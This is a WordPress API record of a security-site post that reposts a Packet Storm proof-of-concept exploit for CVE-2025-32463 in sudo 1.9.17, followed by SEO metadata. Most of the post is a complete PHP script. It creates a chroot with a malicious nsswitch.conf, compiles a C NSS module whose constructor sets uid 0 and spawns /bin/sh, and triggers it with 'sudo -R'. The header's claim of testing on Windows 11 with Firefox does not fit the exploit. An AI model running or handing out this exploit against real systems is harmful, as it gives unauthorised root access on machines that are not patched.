{"id":27867,"date":"2025-11-27T12:50:07","date_gmt":"2025-11-27T12:50:07","guid":{"rendered":"http:\/\/localhost\/?p=27867"},"modified":"2025-11-27T12:50:07","modified_gmt":"2025-11-27T12:50:07","slug":"sudo-1917-local-privilege-escalation","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=27867","title":{"rendered":"\ud83d\udcc4 sudo 1.9.17 Local Privilege Escalation_PACKETSTORM:212157"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-11-27T18:33:39&#8243;,&#8221;description&#8221;:&#8221;sudo version 1.9.17 local privilege escalation proof of concept exploit that leverages NSS module loading&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-27T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-27T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 sudo 1.9.17 Local Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212157&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-32463&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : sudo 1.9.17 local Privilege Escalation via Sudo Chroot NSS Module Loading                                                   |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/www.sudo.ws\/                                                                                                        |\\n    =============================================================================================================================================\\n    \\n    POC : \\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/212006\/ \\u0026 \\tCVE-2025-32463\\n    \\n    \\n    [+] Summary :\\n    \\n    CVE-2025-32463 is a local privilege escalation vulnerability in Sudo that allows attackers to execute arbitrary code as root \\n    by exploiting the NSS (Name Service Switch) module loading mechanism within a chroot environment. \\n    The vulnerability occurs when sudo&#8217;s &#8211;chroot option loads malicious NSS modules from the chroot environment.\\n    \\n    The vulnerability exists in sudo&#8217;s handling of NSS modules when using the &#8211;chroot option. When sudo executes a command within a chroot environment, it may load NSS modules from the chroot&#8217;s library directories rather than the host system. An attacker with local access can create a malicious chroot environment with a crafted NSS module that executes arbitrary code when loaded.\\n    \\n    [+] Technical Analysis :\\n    \\n    **Vulnerability Mechanism:**\\n    \\n    1. Attacker creates a chroot environment with malicious NSS configuration\\n    2. The nsswitch.conf inside chroot points to a malicious NSS module\\n    3. When sudo &#8211;chroot is executed, it loads the malicious module\\n    4. The module&#8217;s constructor function executes with root privileges\\n    \\n    **Key Vulnerable Components:**\\n    \\n    &#8211; Sudo&#8217;s chroot implementation\\n    &#8211; NSS module loading mechanism\\n    &#8211; Dynamic linker behavior in chroot\\n    \\n    [+] Attack Flow :\\n    \\n    1. **Create Malicious Chroot Structure**\\n    \\n    mkdir -p chtoot\/{lib,etc}\\n    \\n    \\n    2. **Write Malicious nsswitch.conf**\\n    \\n    echo \\&#8221;passwd: Xfiles\\&#8221; \\u003e chtoot\/etc\/nsswitch.conf\\n    echo \\&#8221;group: files\\&#8221; \\u003e\\u003e chtoot\/etc\/nsswitch.conf\\n    echo \\&#8221;shadow: files\\&#8221; \\u003e\\u003e chtoot\/etc\/nsswitch.conf\\n    \\n    \\n    [+] Usage: php poc.php\\n    \\n    [+] POC :\\n    \\n    \\u003c?php\\n    \/**\\n     * PoC for CVE-2025-32463: Local privilege escalation via sudo &#8211;chroot\\n     * PHP version of the Python exploit\\n     * \\n     * Use in lab environments only. Do not run on production systems.\\n     *\/\\n    \\n    class SudoChrootExploit {\\n        private $chroot = \\&#8221;.\/chtoot\\&#8221;;\\n        private $libDir;\\n        private $etcDir;\\n        private $payloadC = \\&#8221;payload.c\\&#8221;;\\n        private $libName = \\&#8221;libnss_Xfiles.so.2\\&#8221;;\\n        private $payloadSo;\\n        private $nsswitch;\\n        private $verbose = false;\\n        \\n        public function __construct($verbose = false) {\\n            $this-\\u003everbose = $verbose;\\n            $this-\\u003elibDir = $this-\\u003echroot . \\&#8221;\/lib\\&#8221;;\\n            $this-\\u003eetcDir = $this-\\u003echroot . \\&#8221;\/etc\\&#8221;;\\n            $this-\\u003epayloadSo = $this-\\u003elibDir . \\&#8221;\/\\&#8221; . $this-\\u003elibName;\\n            $this-\\u003ensswitch = $this-\\u003eetcDir . \\&#8221;\/nsswitch.conf\\&#8221;;\\n        }\\n        \\n        private function log($msg) {\\n            if ($this-\\u003everbose) {\\n                echo \\&#8221;[*] \\&#8221; . $msg . PHP_EOL;\\n            }\\n        }\\n        \\n        private function setupChroot() {\\n            echo \\&#8221;[+] Setting up chroot directories&#8230;\\&#8221; . PHP_EOL;\\n            \\n            if (!is_dir($this-\\u003elibDir)) {\\n                mkdir($this-\\u003elibDir, 0755, true);\\n                $this-\\u003elog(\\&#8221;Created directory: \\&#8221; . $this-\\u003elibDir);\\n            }\\n            \\n            if (!is_dir($this-\\u003eetcDir)) {\\n                mkdir($this-\\u003eetcDir, 0755, true);\\n                $this-\\u003elog(\\&#8221;Created directory: \\&#8221; . $this-\\u003eetcDir);\\n            }\\n            \\n            $this-\\u003elog(\\&#8221;Chroot structure created successfully\\&#8221;);\\n        }\\n        \\n        private function writeNsswitch() {\\n            echo \\&#8221;[+] Writing fake nsswitch.conf&#8230;\\&#8221; . PHP_EOL;\\n            \\n            $nsswitchContent = \\&#8221;passwd: Xfiles\\\\n\\&#8221; .\\n                              \\&#8221;group:  files\\\\n\\&#8221; .\\n                              \\&#8221;shadow: files\\\\n\\&#8221;;\\n            \\n            if (file_put_contents($this-\\u003ensswitch, $nsswitchContent) === false) {\\n                throw new Exception(\\&#8221;Failed to write nsswitch.conf\\&#8221;);\\n            }\\n            \\n            $this-\\u003elog(\\&#8221;Written malicious nsswitch.conf to \\&#8221; . $this-\\u003ensswitch);\\n        }\\n        \\n        private function writePayload() {\\n            echo \\&#8221;[+] Writing payload source&#8230;\\&#8221; . PHP_EOL;\\n            \\n            $payloadCode = &#8216;\\n    #include \\u003cstdio.h\\u003e\\n    #include \\u003cstdlib.h\\u003e\\n    #include \\u003cunistd.h\\u003e\\n    #include \\u003cnss.h\\u003e\\n    #include \\u003cpwd.h\\u003e\\n    \\n    __attribute__((constructor)) void init() {\\n        unsetenv(\\&#8221;LD_PRELOAD\\&#8221;);\\n        setuid(0);\\n        setgid(0);\\n        system(\\&#8221;\/bin\/sh\\&#8221;);\\n    }\\n    \\n    enum nss_status _nss_Xfiles_getpwnam_r(const char *name, struct passwd *pwd,\\n                                           char *buf, size_t buflen, int *errnop) {\\n        return NSS_STATUS_NOTFOUND;\\n    }\\n    &#8216;;\\n            \\n            if (file_put_contents($this-\\u003epayloadC, $payloadCode) === false) {\\n                throw new Exception(\\&#8221;Failed to write payload source\\&#8221;);\\n            }\\n            \\n            $this-\\u003elog(\\&#8221;Written C payload to \\&#8221; . $this-\\u003epayloadC);\\n        }\\n        \\n        private function compilePayload() {\\n            echo \\&#8221;[+] Compiling malicious libnss module&#8230;\\&#8221; . PHP_EOL;\\n            \\n            $compileCmd = \\&#8221;gcc -fPIC -shared -o \\&#8221; . \\n                          escapeshellarg($this-\\u003epayloadSo) . \\&#8221; \\&#8221; .\\n                          escapeshellarg($this-\\u003epayloadC) . \\&#8221; -nostartfiles\\&#8221;;\\n            \\n            $this-\\u003elog(\\&#8221;Compilation command: \\&#8221; . $compileCmd);\\n            \\n            $output = [];\\n            $returnCode = 0;\\n            exec($compileCmd . \\&#8221; 2\\u003e\\u00261\\&#8221;, $output, $returnCode);\\n            \\n            if ($returnCode !== 0) {\\n                throw new Exception(\\&#8221;Compilation failed: \\&#8221; . implode(\\&#8221;\\\\n\\&#8221;, $output));\\n            }\\n            \\n            if (!file_exists($this-\\u003epayloadSo)) {\\n                throw new Exception(\\&#8221;Compiled library not found: \\&#8221; . $this-\\u003epayloadSo);\\n            }\\n            \\n            $this-\\u003elog(\\&#8221;Successfully compiled shared object to \\&#8221; . $this-\\u003epayloadSo);\\n        }\\n        \\n        private function cleanup() {\\n            echo \\&#8221;[+] Cleaning up payload source&#8230;\\&#8221; . PHP_EOL;\\n            \\n            if (file_exists($this-\\u003epayloadC)) {\\n                if (unlink($this-\\u003epayloadC)) {\\n                    $this-\\u003elog(\\&#8221;Removed \\&#8221; . $this-\\u003epayloadC);\\n                } else {\\n                    echo \\&#8221;[!] Warning: Failed to remove \\&#8221; . $this-\\u003epayloadC . PHP_EOL;\\n                }\\n            }\\n        }\\n        \\n        private function runExploit() {\\n            echo \\&#8221;[+] Launching sudo with chroot to trigger exploit&#8230;\\&#8221; . PHP_EOL;\\n            \\n            $sudoCmd = \\&#8221;sudo -R \\&#8221; . escapeshellarg($this-\\u003echroot) . \\&#8221; id\\&#8221;;\\n            $this-\\u003elog(\\&#8221;Executing: \\&#8221; . $sudoCmd);\\n            \\n            \/\/ Method 1: Using system()\\n            echo \\&#8221;[*] Attempting exploit via system()&#8230;\\&#8221; . PHP_EOL;\\n            system($sudoCmd, $returnCode);\\n            \\n            if ($returnCode !== 0) {\\n                \/\/ Method 2: Using exec with output\\n                echo \\&#8221;[*] Attempting exploit via exec()&#8230;\\&#8221; . PHP_EOL;\\n                $output = [];\\n                exec($sudoCmd, $output, $returnCode);\\n                \\n                if (!empty($output)) {\\n                    echo \\&#8221;[*] Command output:\\&#8221; . PHP_EOL;\\n                    foreach ($output as $line) {\\n                        echo \\&#8221;    \\&#8221; . $line . PHP_EOL;\\n                    }\\n                }\\n                \\n                if ($returnCode !== 0) {\\n                    echo \\&#8221;[!] Exploit may have failed. Return code: \\&#8221; . $returnCode . PHP_EOL;\\n                    echo \\&#8221;[!] Check if sudo allows chroot and if gcc is installed\\&#8221; . PHP_EOL;\\n                }\\n            }\\n        }\\n        \\n        private function checkDependencies() {\\n            echo \\&#8221;[+] Checking dependencies&#8230;\\&#8221; . PHP_EOL;\\n            \\n            $dependencies = [\\n                &#8216;sudo&#8217; =\\u003e &#8216;sudo &#8211;version&#8217;,\\n                &#8216;gcc&#8217; =\\u003e &#8216;gcc &#8211;version&#8217;,\\n            ];\\n            \\n            foreach ($dependencies as $name =\\u003e $cmd) {\\n                $output = [];\\n                $returnCode = 0;\\n                exec($cmd . \\&#8221; 2\\u003e\/dev\/null\\&#8221;, $output, $returnCode);\\n                \\n                if ($returnCode === 0) {\\n                    $this-\\u003elog(\\&#8221;\u2713 $name is available\\&#8221;);\\n                } else {\\n                    throw new Exception(\\&#8221;\u2717 $name is not available or not in PATH\\&#8221;);\\n                }\\n            }\\n            \\n            $this-\\u003elog(\\&#8221;All dependencies satisfied\\&#8221;);\\n        }\\n        \\n        private function showInfo() {\\n            echo \\&#8221;=== CVE-2025-32463 Exploit Information ===\\&#8221; . PHP_EOL;\\n            echo \\&#8221;Vulnerability: Local privilege escalation via sudo &#8211;chroot\\&#8221; . PHP_EOL;\\n            echo \\&#8221;Mechanism: Malicious NSS module loading in chroot environment\\&#8221; . PHP_EOL;\\n            echo \\&#8221;Target: sudo versions with chroot capability\\&#8221; . PHP_EOL;\\n            echo \\&#8221;Effect: Potential root shell execution\\&#8221; . PHP_EOL;\\n            echo \\&#8221;==========================================\\&#8221; . PHP_EOL . PHP_EOL;\\n        }\\n        \\n        public function run() {\\n            try {\\n                $this-\\u003eshowInfo();\\n                $this-\\u003echeckDependencies();\\n                $this-\\u003esetupChroot();\\n                $this-\\u003ewriteNsswitch();\\n                $this-\\u003ewritePayload();\\n                $this-\\u003ecompilePayload();\\n                $this-\\u003ecleanup();\\n                $this-\\u003erunExploit();\\n                \\n                echo PHP_EOL . \\&#8221;[+] Exploit sequence completed.\\&#8221; . PHP_EOL;\\n                \\n            } catch (Exception $e) {\\n                echo \\&#8221;[!] Error: \\&#8221; . $e-\\u003egetMessage() . PHP_EOL;\\n                echo \\&#8221;[!] Exploit failed.\\&#8221; . PHP_EOL;\\n                exit(1);\\n            }\\n        }\\n        \\n        public function __destruct() {\\n            \/\/ Additional cleanup if needed\\n            if (file_exists($this-\\u003epayloadC)) {\\n                unlink($this-\\u003epayloadC);\\n            }\\n        }\\n    }\\n    \\n    \/\/ Command line argument parsing\\n    function parseArgs() {\\n        $options = getopt(\\&#8221;v\\&#8221;, [\\&#8221;verbose\\&#8221;, \\&#8221;help\\&#8221;]);\\n        \\n        if (isset($options[&#8216;help&#8217;])) {\\n            echo \\&#8221;Usage: php \\&#8221; . basename(__FILE__) . \\&#8221; [OPTIONS]\\&#8221; . PHP_EOL . PHP_EOL;\\n            echo \\&#8221;Options:\\&#8221; . PHP_EOL;\\n            echo \\&#8221;  -v, &#8211;verbose  Enable verbose output for debugging\\&#8221; . PHP_EOL;\\n            echo \\&#8221;      &#8211;help     Show this help message\\&#8221; . PHP_EOL . PHP_EOL;\\n            echo \\&#8221;Description:\\&#8221; . PHP_EOL;\\n            echo \\&#8221;  Proof-of-Concept for CVE-2025-32463: Local privilege escalation\\&#8221; . PHP_EOL;\\n            echo \\&#8221;  via sudo &#8211;chroot using malicious NSS modules.\\&#8221; . PHP_EOL . PHP_EOL;\\n            echo \\&#8221;Warning:\\&#8221; . PHP_EOL;\\n            echo \\&#8221;  Use in lab environments only. Do not run on production systems.\\&#8221; . PHP_EOL;\\n            exit(0);\\n        }\\n        \\n        return [\\n            &#8216;verbose&#8217; =\\u003e isset($options[&#8216;v&#8217;]) || isset($options[&#8216;verbose&#8217;])\\n        ];\\n    }\\n    \\n    \/\/ Main execution\\n    if (php_sapi_name() === &#8216;cli&#8217;) {\\n        $args = parseArgs();\\n        $exploit = new SudoChrootExploit($args[&#8216;verbose&#8217;]);\\n        $exploit-\\u003erun();\\n    } else {\\n        echo \\&#8221;This script must be run from the command line.\\&#8221; . PHP_EOL;\\n        exit(1);\\n    }\\n    ?\\u003e\\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/212157&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.3,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:L\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/212157\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-11-27T18:33:39&#8243;,&#8221;description&#8221;:&#8221;sudo version 1.9.17 local privilege escalation proof of concept exploit that leverages NSS module loading&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-27T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-27T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 sudo 1.9.17 Local Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212157&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-32463&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n | # Title : sudo&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,55,12,13,53,7,11,5],"class_list":["post-27867","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-93","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 sudo 1.9.17 Local Privilege Escalation_PACKETSTORM:212157 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=27867\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 sudo 1.9.17 Local Privilege Escalation_PACKETSTORM:212157 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-11-27T18:33:39&#8243;,&#8221;description&#8221;:&#8221;sudo version 1.9.17 local privilege escalation proof of concept exploit that leverages NSS module loading&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-27T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-27T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 sudo 1.9.17 Local Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212157&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-32463&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | # Title : sudo...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=27867\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-11-27T12:50:07+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27867#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27867\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 sudo 1.9.17 Local Privilege Escalation_PACKETSTORM:212157\",\"datePublished\":\"2025-11-27T12:50:07+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27867\"},\"wordCount\":1565,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.3\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=27867#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27867\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27867\",\"name\":\"\ud83d\udcc4 sudo 1.9.17 Local Privilege Escalation_PACKETSTORM:212157 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-11-27T12:50:07+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27867#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=27867\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27867#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 sudo 1.9.17 Local Privilege Escalation_PACKETSTORM:212157\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 sudo 1.9.17 Local Privilege Escalation_PACKETSTORM:212157 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=27867","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 sudo 1.9.17 Local Privilege Escalation_PACKETSTORM:212157 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-11-27T18:33:39&#8243;,&#8221;description&#8221;:&#8221;sudo version 1.9.17 local privilege escalation proof of concept exploit that leverages NSS module loading&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-27T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-27T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 sudo 1.9.17 Local Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212157&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-32463&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | # Title : sudo...","og_url":"https:\/\/zero.redgem.net\/?p=27867","og_site_name":"zero redgem","article_published_time":"2025-11-27T12:50:07+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=27867#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=27867"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 sudo 1.9.17 Local Privilege Escalation_PACKETSTORM:212157","datePublished":"2025-11-27T12:50:07+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=27867"},"wordCount":1565,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.3","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=27867#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=27867","url":"https:\/\/zero.redgem.net\/?p=27867","name":"\ud83d\udcc4 sudo 1.9.17 Local Privilege Escalation_PACKETSTORM:212157 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-11-27T12:50:07+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=27867#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=27867"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=27867#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 sudo 1.9.17 Local Privilege Escalation_PACKETSTORM:212157"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero 